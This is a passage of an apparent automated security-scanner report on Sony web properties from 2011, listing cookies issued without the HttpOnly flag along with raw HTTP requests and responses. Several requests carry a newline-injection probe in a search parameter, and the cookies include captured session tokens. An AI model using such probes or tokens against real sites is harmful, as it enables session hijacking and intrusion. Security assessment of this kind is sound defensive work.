Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=621E1E69E4996835A7FBF59CEC15156D; Path=/selfservice
PRAGMA: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html
Content-Length: 0
Date: Tue, 06 Sep 2011 18:56:37 GMT
Connection: close


7.3. http://www.kb.sony.com/selfservice/common/extIFrame.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/extIFrame.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/extIFrame.jsp?docURL=https%3A%2F%2Fwww.docs.sony.com%2FRelease%2FBNP1_US_ES.pdf%23Page%3D1 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=044E57DAE7FB0BABCDB708FE81384074; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 1062
Date: Tue, 06 Sep 2011 18:56:01 GMT
Connection: close


<head>
<style type="text/css">
* {padding:0;margin:0}
body {margin: 0 0px}
</style>
<script language="javascript">
//grab the needed sony variables for the si
...[SNIP]...

7.4. http://www.kb.sony.com/selfservice/common/viewdocument_appFooter.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appFooter.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_appFooter.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=9040A36B723BD38D401B803C540F0FCC; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 2794
Date: Tue, 06 Sep 2011 18:56:00 GMT


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#FFFFFF" text=
...[SNIP]...

7.5. http://www.kb.sony.com/selfservice/common/viewdocument_appHeader.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_appHeader.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_appHeader.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.9,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":6,"lc":{"d0":{"v":6,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7; fsr.a=1315353369099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A073C5F219F136212A7F823E00AE1666; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Date: Tue, 06 Sep 2011 18:56:00 GMT
Content-Length: 4975

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/c
...[SNIP]...

7.6. http://www.kb.sony.com/selfservice/common/viewdocument_forFrameset_Metadata.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/common/viewdocument_forFrameset_Metadata.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/common/viewdocument_forFrameset_Metadata.jsp?externalId=BNP1USESpdf&sliceId=pdfPage_1&docType=kc&cmd=displayKC&dialogID=328802488&docTypeID=DT_MANUAL_1_1&stateId=1+0+328800848 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/search.do?cmd=displayKC&docType=kc&externalId=BNP1USESpdf&sliceId=pdfPage_1&docTypeID=DT_MANUAL_1_1&dialogID=328802488&stateId=1%200%20328800848
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353368884,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E863918E75FCBD614E29DB14317D33BC; Path=/selfservice
Content-Type: text/html;charset=UTF-8
Content-Length: 477
Date: Tue, 06 Sep 2011 18:56:01 GMT
Connection: close


<html>
<head>
<title>Search Results Page</title>
<link href="/selfservice/css/kanisa.css" type="text/css" rel="stylesheet">
</head>

<body bgcolor="#ffffff" t
...[SNIP]...

7.7. http://www.kb.sony.com/selfservice/getUMBrowseImageById.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.kb.sony.com
Path:   /selfservice/getUMBrowseImageById.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /selfservice/getUMBrowseImageById.do?objectId=DT_MANUAL_1_1&imageType=0 HTTP/1.1
Host: www.kb.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kb.sony.com/selfservice/microsites/searchEntry.do
Cookie: JSESSIONID=C67BB4FBDF34CCAFD386E43CD4851D16; foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.8,"c":"http://www.kb.sony.com/selfservice/microsites/searchEntry.do","pv":5,"lc":{"d0":{"v":5,"s":true}},"f":1315353359267,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; JSESSIONID=6F1BBF4FAA397E25738BB1398F7623C7

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=237B9DF2794C1A2815026B92F3AA0455; Path=/selfservice
Location: http://www.kb.sony.com/Platform/Publishing/images/DT/icons/703/DT_MANUAL_1_1
Content-Type: image/png;charset=iso-8859-1
Content-Length: 0
Date: Tue, 06 Sep 2011 18:55:51 GMT


7.8. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/ HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 403 Forbidden
Content-Length: 356
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=da114474f5035b15c5e0e87e91973c20f38683c19e52537a4e666d6d; Path=/
X-N: S

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /wcsstore/SonyStyleStorefrontAssetS
...[SNIP]...

7.9. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSS690CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2538
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=2544eac492c2dc3895ccfa48e0767ad10bf63e8e5de0bbeb4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

7.10. http://store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/SonyStyleStorefrontAssetStore/img/75x49/XSV680CX.jpg HTTP/1.1
Host: store.sony.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category
Cookie: foresee.analytics=%7B%22rr_domain%22%3A%22sony.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221315353160538_2645%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://www.kb.sony.com/selfservice/microsites/search.do","pv":7,"lc":{"d0":{"v":7,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; session_id=c74a1faf4d1c0dea4e31548d301da229; mbox=check#true#1315353593|session#1315353532502-883329#1315355393|PC#1315353532502-883329.19#1316563137; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog?Ntt=dvd+cd22e7a%0af613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category; ensUID=24911858XbQLKBqeKLq4; fsr.s={"v":-2,"rid":"1315353161834_303572","ru":"http://www.fakereferrerdominator.com/referrerPathName?RefParName=RefValue","r":"www.fakereferrerdominator.com","st":"","to":4.5,"c":"http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog\nf613d80aa8c&langId=-1&Ntk=Product&storeId=10151&Ntx=mode+matchallpartial&y=0&N=4294951323&catalogId=10551&x=0&navigation=Category","pv":8,"lc":{"d0":{"v":8,"s":true}},"f":1315353405872,"cp":{"session_id":"c74a1faf4d1c0dea4e31548d301da229","mdl":"6435Y6T45"}}; __utma=171551074.117667101.1315353535.1315353535.1315353535.1; __utmb=171551074.1.10.1315353535; __utmc=171551074; __utmz=171551074.1315353535.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; s_cc=true; s_visit=1; c_m=undefinedwww.fakereferrerdominator.comwww.fakereferrerdominator.com; s_channel=%5B%5B%27Other%27%2C%271315353536253%27%5D%5D; _ensChanVal=Other|1315353536253; 71737897-VID=546022977410; 71737897-SKEY=6355490732959706782; HumanClickSiteContainerID_71737897=STANDALONE; s_sq=sonysonystyle2007prod%3D%2526pid%253Dhttp%25253A//store.sony.com/webapp/wcs/stores/servlet/SearchCatalog%25253FNtt%25253Ddvd%25252Bcd22e7a%2525250af613d80aa8c%252526langId%25253D-1%252526Ntk%25253DProduct%252526storeId%25253D10151%252526Ntx%25253Dmode%25252Bmatchallpartial%252526y%25253D0%252526N%25253D4294951323%252526catalogId%25253D10551%252526x%25253D0%252526navigation%25253DCategory%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE; JSESSIONID=0000hbdldlqruxn7wW5RLkXbe7x:14aelt2in; ABC123=7DYX+1Qz/QuAogZJJZljY957NC3b7BnKiPxMZiX67xjGNdnPFOQ8Ip6lm/ncya4bhXDpVhL6J7mBGds=; TS5bbf46=5285369a91c7b25e104e86b5dc8ca7e17a36af95430dd8404e666d6dd5df5daf8381a135

Response

HTTP/1.1 200 OK
Last-Modified: Sat, 22 Jan 2011 00:56:42 GMT
Accept-Ranges: bytes
Content-Length: 2226
Content-Type: image/jpeg
Date: Tue, 06 Sep 2011 18:58:53 GMT
Connection: close
Set-Cookie: TS5bbf46=1a65098a520cb6ff661ed74f78596f6045afc60247190eee4e666d6d; Path=/
Cache-Control: private

......JFIF.....d.d......Ducky.......d......Adobe.d.................................................................................................................................................1.K..
...[SNIP]...

7.11. http://store.sony.com/webapp/wcs/stores/servlet/SYErrorRedirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SYErrorRedirect

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/SYErrorRedirect?URL=StoreCatalogDisplay&storeId=10151&langId=-1&catalogId=10551&eid=437018621 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
